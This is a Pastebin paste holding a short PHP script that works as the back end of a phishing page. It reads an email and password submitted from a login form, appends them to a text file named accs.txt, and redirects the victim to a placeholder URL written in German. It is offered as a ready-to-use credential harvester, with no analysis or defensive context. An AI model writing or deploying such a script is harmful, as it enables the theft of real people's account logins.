Guest User

Untitled

a guest
Jul 27th, 2018
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. <?php
  2.  
  3. $pass = $_POST['login_email'];
  4. $user = $_POST['ogin_password'];
  5. $file = fopen("accs.txt","a");
  6. $intofile = "User : ".$user."\nPass : ".$pass."\n";
  7. fwrite($file,$intofile);
  8. fclose($file);
  9. header('Location: DEINE SEITE ');
  10.  
  11.  
  12. ?>
Add Comment
Please, Sign In to add comment